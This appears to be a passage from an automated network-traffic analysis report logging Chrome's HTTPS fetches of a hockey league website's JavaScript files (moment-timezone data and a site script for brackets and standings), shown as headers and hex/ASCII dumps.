                                                                                                                          2025-01-13 21:01:17 UTC10628INData Raw: b4 c9 c4 22 65 23 92 37 7f 96 3b 8a 78 c9 f8 16 66 f2 23 8c 51 68 ec 53 31 44 bd 64 e0 aa b4 a6 d6 fe f6 11 7c d2 68 da c9 2e e3 d8 9c 7b 3c 4a 8b b6 50 ec 6d fd e1 c6 07 f0 d1 7c dc 7a e0 80 05 51 24 2e df 3b a9 53 62 d7 1e 67 68 fe 98 f5 73 aa 96 7b 5d 0d bd 57 b6 38 97 6d 81 dd c8 02 c4 a6 12 12 6e 7e 5c 30 f4 e7 05 94 76 21 b3 da a8 2f 6b 5a e3 57 26 42 84 00 ca 93 37 6b 70 4a 8f e5 8c e2 dd f1 a2 3d a9 f2 e9 de af 2c cd 04 c5 a0 f0 bd df c3 3d 95 ae 5a e3 9f 3b 73 f4 18 cf 26 51 b1 93 62 93 7e 0e 3e a5 d1 e7 b1 dc 32 36 b4 ed 77 ef bb fc 50 c7 60 9b 43 38 dc 6c 30 4e 5f 43 57 5f 28 8a 97 2d a8 ac 6e 51 56 14 66 6d c7 b7 00 1f cb 03 4a 4f 96 0e c8 b5 46 a3 d2 f3 4d 3e 9d ce ab 32 e9 2a 23 31 4a 69 e5 28 5d 0f 91 b6 38 fc 6d cf 63 5c 21 d1 dd ab 5b 45
                                                                                                                          Data Ascii: "e#7;xf#QhS1Dd|h.{<JPm|zQ$.;Sbghs{]W8mn~\0v!/kZW&B7kpJ=,=Z;s&Qb~>26wP`C8l0N_CW_(-nQVfmJOFM>2*#1Ji(]8mc\![E
                                                                                                                          2025-01-13 21:01:17 UTC10705INData Raw: 38 e3 8f b1 c1 d4 71 d3 c2 58 31 51 27 75 2f 75 fe 47 f7 61 7a 38 20 8a 56 4a 89 03 32 ad 95 01 b8 2d ea 3d 3b e0 54 a1 8a 67 78 e6 a9 0b 26 f2 07 c3 60 9f d3 04 e3 61 08 d0 a2 e6 74 0c 91 ce 63 74 94 5c 15 4e c7 cc 5e f8 e1 d7 28 04 2a 97 52 08 f3 61 f5 f3 c0 eb 93 d7 d3 46 5a 9e bd 65 75 bd 8f 88 39 1f 9e 04 6a ac d8 03 23 95 22 f6 32 97 53 cf a0 c2 c0 bd 8a 32 ea dc 22 67 9f 2e 91 5a 30 d2 06 00 85 66 53 62 70 14 52 d3 46 ce ec bf 83 f1 0b 79 7a 61 72 6b 1e 25 21 5c 07 f8 8b f0 01 18 e9 a2 af 78 84 32 d2 bc a1 be 23 62 07 03 fd 1c 5d 00 88 ca e2 dc bc 92 13 24 73 fe ba 98 bb 21 bb 15 09 62 bf 2e f8 4d 29 23 89 ed 22 4a 19 b9 d8 ea 0e e1 f5 c7 b1 53 d6 42 d7 5a 3b 46 c2 c7 71 2a 08 27 cc fa 61 5a 74 a9 42 7c 36 5b 1b 80 b7 2f 6f 4e dc 60 c1 ec 48 dd 7b
                                                                                                                          Data Ascii: 8qX1Q'u/uGaz8 VJ2-=;Tgx&`atct\N^(*RaFZeu9j#"2S2"g.Z0fSbpRFyzark%!\x2#b]$s!b.M)#"JSBZ;Fq*'aZtB|6[/oN`H{


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          71192.168.11.2049881137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC466OUTGET /app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-data.min.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:18 UTC524INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 195222
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Sat, 14 Nov 2020 13:50:27 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:20 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961971157 961417482
                                                                                                                          Age: 118
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"5fafe0a3-2fa96"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:18 UTC15860INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 63 2c 4d 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 4d 28 72 65 71 75 69 72 65 28 22 6d 6f 6d 65 6e 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6d 6f 6d 65 6e 74 22 5d 2c 4d 29 3a 4d 28 63 2e 6d 6f 6d 65 6e 74 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 6f 69 64 20 30 3d 3d 3d 62 2e 76 65 72 73 69 6f 6e 26 26 62 2e 64 65 66 61 75 6c 74 26 26 28 62 3d 62 2e 64 65 66 61 75 6c 74 29 3b 76 61 72 20
                                                                                                                          Data Ascii: !function(c,M){"use strict";"object"==typeof module&&module.exports?module.exports=M(require("moment")):"function"==typeof define&&define.amd?define(["moment"],M):M(c.moment)}(this,function(b){"use strict";void 0===b.version&&b.default&&(b=b.default);var
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 58 30 20 31 43 31 30 20 4d 6e 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4c 58 30 20 31 43 31 30 20 4d 6e 30 20 4d 4e 30 20 32 6a 7a 30 20 4d 4e 30 20 34 6c 58 30 20 75 31 30 20 35 4c 62 30 20 31 70 42 30 20 46 6e 7a 30 20 75 31 30 20 75 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 53 4c 30 20 31 76 64 30 20 31 37 7a 30 20 31 63 4e 30 20 31 66 7a 30 20 31 63 4e 30 20 31 63 4c 30 20 31 63 4e 30 20 61 73 6e 30 20 44 62 30 20 7a 76 64 30 20 42 7a 30 20 31 74 42 30 20 54 58 30 20 31 7a 65 30 20 54 58 30 20 31 6c 64 30 20 57 4b 30 20 31 77 70 30 20 54 58 30 20 41 34 70 30 20 75 4c 30 7c 22 2c 22 41 6d 65 72 69 63 61 2f 41 72 67 65 6e 74 69 6e 61 2f 4c 61 5f 52 69 6f 6a 61 7c 43 4d 54 20 2d 30 34 20 2d 30 33 20 2d 30 32 7c
                                                                                                                          Data Ascii: X0 1C10 Mn0 1C10 LX0 1C10 LX0 1C10 LX0 1C10 Mn0 MN0 2jz0 MN0 4lX0 u10 5Lb0 1pB0 Fnz0 u10 uL0 1vd0 SL0 1vd0 SL0 1vd0 17z0 1cN0 1fz0 1cN0 1cL0 1cN0 asn0 Db0 zvd0 Bz0 1tB0 TX0 1ze0 TX0 1ld0 WK0 1wp0 TX0 A4p0 uL0|","America/Argentina/La_Rioja|CMT -04 -03 -02|
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 33 2e 63 20 57 4c 30 20 31 71 4e 30 20 57 4c 30 7c 31 31 65 35 22 2c 22 41 6d 65 72 69 63 61 2f 54 69 6a 75 61 6e 61 7c 4c 4d 54 20 4d 53 54 20 50 53 54 20 50 44 54 20 50 57 54 20 50 50 54 7c 37 4d 2e 34 20 37 30 20 38 30 20 37 30 20 37 30 20 37 30 7c 30 31 32 31 32 33 32 34 35 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 7c 2d 31 55 51 45 30 20 34 50 58 30 20 38 6d 4d 30 20 38 6c 63
                                                                                                                          Data Ascii: 3.c WL0 1qN0 WL0|11e5","America/Tijuana|LMT MST PST PDT PWT PPT|7M.4 70 80 70 70 70|012123245232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232323232|-1UQE0 4PX0 8mM0 8lc
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 7c 33 33 65 33 22 2c 22 41 6d 65 72 69 63 61 2f 4b 65 6e 74 75 63 6b 79 2f 4c 6f 75 69 73 76 69 6c 6c 65 7c 43 53 54 20 43 44 54 20 43 57 54 20 43 50 54 20 45 53 54 20 45 44 54 7c 36 30 20 35 30 20 35 30 20 35 30 20 35 30 20 34 30 7c 30 31 30 31 30 31 30 31 30 32 33 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 34 35 34 35 34 35 34 35 34 35 34 35 34 31 34 35
                                                                                                                          Data Ascii: p0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0|33e3","America/Kentucky/Louisville|CST CDT CWT CPT EST EDT|60 50 50 50 50 40|01010101023010101010101010101010101014545454545454145
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 7c 33 38 65 32 22 2c 22 41 6d 65 72 69 63 61 2f 4e 6f 72 6f 6e 68 61 7c 4c 4d 54 20 2d 30 32 20 2d 30 31 7c 32 39 2e 45 20 32 30 20 31 30 7c 30 31 32 31 32 31 32 31 32
                                                                                                                          Data Ascii: 0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0|38e2","America/Noronha|LMT -02 -01|29.E 20 10|012121212
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 52 64 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 20 4f 70 30 20 31 7a 62 30 7c 31 31 65 34 22 2c 22 41 6d 65 72 69 63 61 2f 56 61 6e 63 6f 75 76 65 72 7c 50 53 54 20 50 44 54 20 50 57 54 20 50 50 54 7c 38 30 20 37 30 20 37 30 20 37 30 7c 30 31 30 32 33 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30
                                                                                                                          Data Ascii: 0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Rd0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0 Op0 1zb0|11e4","America/Vancouver|PST PDT PWT PPT|80 70 70 70|010230101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 33 32 31 7c 2d 31 50 63 34 7a 2e 63 20 65 55 6e 7a 2e 63 20 32 33 43 4c 30 20 31 64 62 30 20 31 63 4e 30 20 31 64 62 30 20 31 63 4e 30 20 31 64 62 30 20 31 64 64 30 20 31 63 4f 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 66 41 30 20 32 68 42 30 7c 37 36 65 34 22 2c 22 41 73 69 61 2f 46 61 6d 61 67 75 73 74 61 7c 4c 4d 54 20 45 45 54 20 45 45 53 54 20 2b 30 33 7c 2d 32 66 2e 4d 20 2d 32 30 20 2d 33 30 20 2d 33 30 7c 30 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31 32 31
                                                                                                                          Data Ascii: 3232323232323232321|-1Pc4z.c eUnz.c 23CL0 1db0 1cN0 1db0 1cN0 1db0 1dd0 1cO0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1fA0 2hB0|76e4","Asia/Famagusta|LMT EET EEST +03|-2f.M -20 -30 -30|01212121212121212121212121212121212121212121212121212121
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 73 69 61 2f 55 73 74 2d 4e 65 72 61 7c 4c 4d 54 20 2b 30 38 20 2b 30 39 20 2b 31 32 20 2b 31 31 20 2b 31 30 7c 2d 39 77 2e 53 20 2d 38 30 20 2d 39 30 20 2d 63 30 20 2d 62 30 20 2d 61 30 7c 30 31 32 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 35 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 33 34 35 7c 2d 32 31 51 39 77 2e 53 20 70 41 70 77 2e 53 20 32 33 43 4c 30 20 31 64 39 30 20 31 63 4e 30 20 31 64 62 30 20 31 63 4e 30 20 31 64 62 30 20 31 64 64 30 20 31 63 4f 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 63 4d 30 20 31 66 41 30 20 32 70 42 30 20 49 4d 30
                                                                                                                          Data Ascii: sia/Ust-Nera|LMT +08 +09 +12 +11 +10|-9w.S -80 -90 -c0 -b0 -a0|012343434343434343434345434343434343434343434343434343434343434345|-21Q9w.S pApw.S 23CL0 1d90 1cN0 1db0 1cN0 1db0 1dd0 1cO0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1cM0 1fA0 2pB0 IM0
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 30 20 31 4e 62 30 20 41 70 30 20 31 7a 62 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 71 4c 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 71 4c 30 20 57 4e 30 20 31 71 4c 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 20 31 71 4c 30 20 57 4e 30 20 31 71 4c 30 20 31 31 42 30 20 31 6e 58 30 20 31 31 42 30 7c 33 30 65 32 22 2c 22 43 53 54 36 43 44 54 7c 43 53 54 20 43 44 54 20 43 57 54 20 43 50 54 7c 36 30 20 35 30 20 35 30 20 35 30 7c 30 31 30 31 30 32 33 30 31 30 31 30 31
                                                                                                                          Data Ascii: 0 1Nb0 Ap0 1zb0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1qL0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1qL0 WN0 1qL0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1nX0 11B0 1qL0 WN0 1qL0 11B0 1nX0 11B0|30e2","CST6CDT|CST CDT CWT CPT|60 50 50 50|0101023010101
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 31 6f 30 30 20 31 31 41 30 20 31 71 4d 30 20 57 4d 30 20 31 71 4d 30 20 57 4d 30 20 31 71 4d 30 20 57 4d 30 20 31 71 4d 30 20 31 31 41 30 20 31 6f 30 30 20 31 31 41 30 20 31 6f 30 30 7c 36 37 65 34 22 2c 22 45 75 72 6f 70 65 2f 43 6f 70 65 6e 68 61 67 65 6e 7c 43 45 54 20 43 45 53 54 7c 2d 31 30 20 2d 32 30 7c 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30 7c 2d 32 61 7a 43 30 20 54 7a 30 20 56 75 4f 30 20 36
                                                                                                                          Data Ascii: 1o00 11A0 1qM0 WM0 1qM0 WM0 1qM0 WM0 1qM0 11A0 1o00 11A0 1o00|67e4","Europe/Copenhagen|CET CEST|-10 -20|0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010|-2azC0 Tz0 VuO0 6


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          72192.168.11.2049883137.117.65.2224431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:17 UTC424OUTGET /app/themes/base/assets/dist/scripts/js/main.js HTTP/1.1
                                                                                                                          Host: gthlcanada.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _icl_current_language=en
                                                                                                                          2025-01-13 21:01:18 UTC523INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 653479
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Last-Modified: Tue, 26 Jan 2021 19:13:09 GMT
                                                                                                                          Expires: Tue, 14 Jan 2025 20:59:54 GMT
                                                                                                                          Cache-Control: max-age=86400, public
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          X-Varnish: 961611623 961970747
                                                                                                                          Age: 84
                                                                                                                          Via: 1.1 varnish-v4
                                                                                                                          ETag: W/"601069c5-9f8a7"
                                                                                                                          X-Cache: HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2025-01-13 21:01:18 UTC15861INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 24 2c 20 41 64 33 30 30 2c 20 41 72 65 6e 61 54 61 62 6c 65 2c 20 42 61 73 65 54 61 62 6c 65 4d 69 78 69 6e 2c 20 42 72 61 63 6b 65 74 41 70 70 2c 20 42 72 61 63 6b 65 74 43 68 61 6d 70 69 6f 6e 2c 20 42 72 61 63 6b 65 74 4d 6f 64 61 6c 2c 20 42 72 61 63 6b 65 74 4d 6f 64 61 6c 47 61 6d 65 2c 20 42 72 61 63 6b 65 74 50 61 67 65 2c 20 42 72 61 63 6b 65 74 52 6f 75 6e 64 2c 20 42 72 61 63 6b 65 74 53 65 72 69 65 73 2c 20 42 72 61 63 6b 65 74 53 65 72 69 65 73 54 65 61 6d 2c 20 43 53 41 53 65 61 73 6f 6e 56 69 65 77 53 65 6c 65 63 74 2c 20 43 6f 61 63 68 65 73 54 61 62 6c 65 2c 20 44 69 76 69 73 69 6f 6e 53 74 61 6e 64 69 6e 67 73 2c 20 47 61 6d 65 42 6f 78 2c 20 47 61 6d 65 44 61 79 53 65 6c 65 63
                                                                                                                          Data Ascii: (function() { var $, Ad300, ArenaTable, BaseTableMixin, BracketApp, BracketChampion, BracketModal, BracketModalGame, BracketPage, BracketRound, BracketSeries, BracketSeriesTeam, CSASeasonViewSelect, CoachesTable, DivisionStandings, GameBox, GameDaySelec
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 2e 69 73 5f 6c 6f 61 64 69 6e 67 5f 64 61 74 61 20 26 26 20 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 2e 69 73 5f 6c 6f 61 64 69 6e 67 5f 6e 65 78 74 5f 70 61 67 65 20 3f 20 22 4c 6f 61 64 69 6e 67 20 4e 65 78 74 20 50 61 67 65 2e 2e 2e 22 20 3a 20 62 75 74 74 6f 6e 28 7b 0a 20 20 20 20 20 20 20 20 6f 6e 43 6c 69 63 6b 3a 20 74 68 69 73 2e 70 72 6f 70 73 2e 70 61 67 65 5f 66 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 28 6e 75 6c 6c 2c 20 4d 61 74 68 2e 6d 61 78 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 74 68 69 73 2e 73 74 61 74 65 2e 6c 6f 61 64 69 6e 67 2e 70 61 67 65 73 5f 6c 6f 61 64 65 64 29 20 2b 20 31 2c 20 74 68 69 73 2e 70 72 6f 70 73 2e 73 6f 72 74 5f 63 61 74 65 67 6f 72 79 29 0a 20 20 20 20
                                                                                                                          Data Ascii: his.state.loading.is_loading_data && this.state.loading.is_loading_next_page ? "Loading Next Page..." : button({ onClick: this.props.page_function.bind(null, Math.max.apply(null, this.state.loading.pages_loaded) + 1, this.props.sort_category)
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 74 68 69 73 2e 64 6f 65 73 6a 51 75 65 72 79 45 78 69 73 74 28 29 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3b 0a 0a 20 20 20 20 53 69 7a 65 4d 61 74 74 65 72 73 2e 70 72 6f 74 6f 74 79 70 65 2e 68 6f 77 4d 75 63 68 57 69 6c 6c 46 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 74 65 78 74 2c 20 70 61 72 61 6d 73 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 68 65 63 6b 44 69 72 65 63 74 69 6f 6e 2c 20 63 68 65 63 6b 49 6e 64 65 78 2c 20 63 6f 6d 70 61 72 69 73 6f 6e 48 65 69 67 68 74 2c 20 63 6f 6d 70 61 72 69 73 6f 6e 57 69 64 74 68 2c 20 63 75 72 72 65 6e 74 54 65 78 74 2c 20 64 69 6d 65 6e 73 69 6f 6e 73 2c 20 64 69 73 74 61 6e 63 65 2c 20 64 69 76 50 61 72 61 6d 73 2c 20 64 69 76 54
                                                                                                                          Data Ascii: this.doesjQueryExist()) { return false; } }; SizeMatters.prototype.howMuchWillFit = function(text, params) { var checkDirection, checkIndex, comparisonHeight, comparisonWidth, currentText, dimensions, distance, divParams, divT
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 61 77 61 79 5f 74 65 61 6d 5f 63 6f 64 65 3a 20 61 64 6a 75 73 74 54 65 61 6d 43 6f 64 65 28 5f 74 68 69 73 2e 70 72 6f 70 73 2e 61 6c 6c 5f 74 65 61 6d 73 5b 67 61 6d 65 2e 76 69 73 69 74 69 6e 67 5f 74 65 61 6d 5d 2e 74 65 61 6d 5f 63 6f 64 65 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 61 67 75 65 3a 20 5f 74 68 69 73 2e 70 72 6f 70 73 2e 6c 65 61 67 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 61 73 6f 6e 3a 20 5f 74 68 69 73 2e 70 72 6f 70 73 2e 73 65 61 73 6f 6e 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 61 6e 67 3a 20 5f 74 68 69 73 2e 70 72 6f 70 73 2e 6c 61 6e 67 0a 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 7d 29 28 74 68 69 73 29 29 29 29 29
                                                                                                                          Data Ascii: away_team_code: adjustTeamCode(_this.props.all_teams[game.visiting_team].team_code), league: _this.props.league, season: _this.props.season, lang: _this.props.lang }); }; })(this)))))
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 20 20 69 73 4f 76 65 72 74 69 6d 65 33 47 61 6d 65 3a 20 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 61 74 61 2e 68 6f 6d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 36 22 29 20 7c 7c 20 64 61 74 61 2e 76 69 73 69 74 69 6e 67 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 36 22 29 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 69 73 53 68 6f 6f 74 6f 75 74 47 61 6d 65 3a 20 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 61 74 61 2e 68 6f 6d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 53 4f 22 29 20 7c 7c 20 64 61 74 61 2e 76 69 73 69 74 69 6e 67 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 53 4f 22 29 3b 0a 20 20 20 20 7d 0a 20 20 7d 3b 0a
                                                                                                                          Data Ascii: isOvertime3Game: function(data) { return data.home.hasOwnProperty("6") || data.visiting.hasOwnProperty("6"); }, isShootoutGame: function(data) { return data.home.hasOwnProperty("SO") || data.visiting.hasOwnProperty("SO"); } };
